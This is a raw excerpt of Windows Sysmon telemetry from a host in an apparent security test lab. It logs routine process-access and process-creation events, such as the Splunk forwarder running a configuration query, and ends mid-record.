15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004794Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-F400-000000008801}5004C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004793Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-F400-000000008801}5004C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004792Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7CD8-5FA1-F300-000000008801}6563376C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CD8-5FA1-F400-000000008801}5004C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004791Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.295{D28789B6-7CD8-5FA1-F400-000000008801}5004C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CD8-5FA1-F300-000000008801}656C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000004790Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004789Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004788Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004787Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004786Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004785Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004784Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004783Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004782Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004781Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-F300-000000008801}656C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004780Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004779Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004778Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004777Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004776Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004775Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004774Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004773Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004772Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004771Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-F300-000000008801}656C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004770Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-F200-000000008801}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004769Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7CD8-5FA1-F100-000000008801}8844152C:\Windows\system32\cmd.exe{D28789B6-7CD8-5FA1-F300-000000008801}656C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004768Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYST